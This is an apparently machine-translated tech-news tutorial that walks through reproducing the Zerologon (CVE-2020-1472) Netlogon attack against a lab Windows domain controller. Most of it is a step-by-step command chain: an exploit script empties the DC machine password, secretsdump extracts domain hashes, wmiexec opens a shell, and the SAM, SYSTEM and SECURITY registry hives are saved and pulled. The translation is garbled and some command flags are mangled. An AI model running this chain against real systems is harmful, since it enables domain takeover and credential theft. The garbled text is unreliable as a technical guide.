How to review the Netlogon privilege escalation vulnerability CVE 2020-1472 01/17 Update SLTechnology News&Howtos

How to review the Netlogon privilege escalation vulnerability CVE 2020-1472

2025-01-17 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)05/31 Report--

Netlogon privilege upgrade vulnerability CVE 2020-1472 how to review, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

1. Recurring environment

DC:

Os:windows 2012 server

Ip:192.168.236.132

Attack aircraft:

Os:kali

Ip:192.168.236.130

two。 Affected version Windows Server 2008 R2 for x64-based SystemsService Pack 1Windows Server 2008 R2 for x64-basedSystems Service Pack 1 (Server Core installation) Windows Server 2012Windows Server 2012 (Server Core installation) Windows Server 2012 R2Windows Server 2012 R2 (Server Core installation) Windows Server 2016Windows Server 2016 (Server Core installation) Windows Server 2019Windows Server 2019 (Server Core installation) Windows Server, version 1903 (Server Core installation) Windows Server, version 1909 (Server Core installation) Windows Server, version 2004 (Server Core installation) 3. Reference articles on the Construction of Domain Control Environment

Sectool/251828.html

4. Recurrence process 4.1 vulnerability verification

POC link

4.2 vulnerability exploitation

Install the latest Impacket, otherwise an error will be reported

4.2.1 download attack exp

EXP download

4.2.2 empty password

Python3 cve-2020-1472-exploit.py WIN-F6STUQIU7D8 192.168.236.132

4.2.3 get hash

Enter into impacket/examples

Python3 secretsdump.py DOMAIN/WIN-F6STUQIU7D8\ $@ 192.168.236.132-just-dc-no-pass

4.2.4 get shell

Python3 wmiexec.py-hashes DOMAIN/administrator\ @ IP

4.2.5 get the original hash

Reg save HKLM\ SYSTEM system.savereg save HKLM\ SAM sam.savereg save HKLM\ SECURITY security.saveget system.saveget sam.saveget security.savedel / f system.savedel / f sam.savedel / f security.saveexit

4.2.6 parsing hash

Save $MACHINE.ACC section: XXXXXXXXXXXXXX:XXXXXXX

Python3 secretsdump.py-sam sam.save-system system.save-security security.save LOCAL4.2.7 restore hash

Restore link

Python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR

4.2.8 verify recovery

Use the command to get hash to verify the restore

Python3 secretsdump.py DOMAIN/DC_NETBIOS_NAME\ $@ DC_IP_ADDR-just-dc-no-pass

5. Repair suggestion

Official repair proposal

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.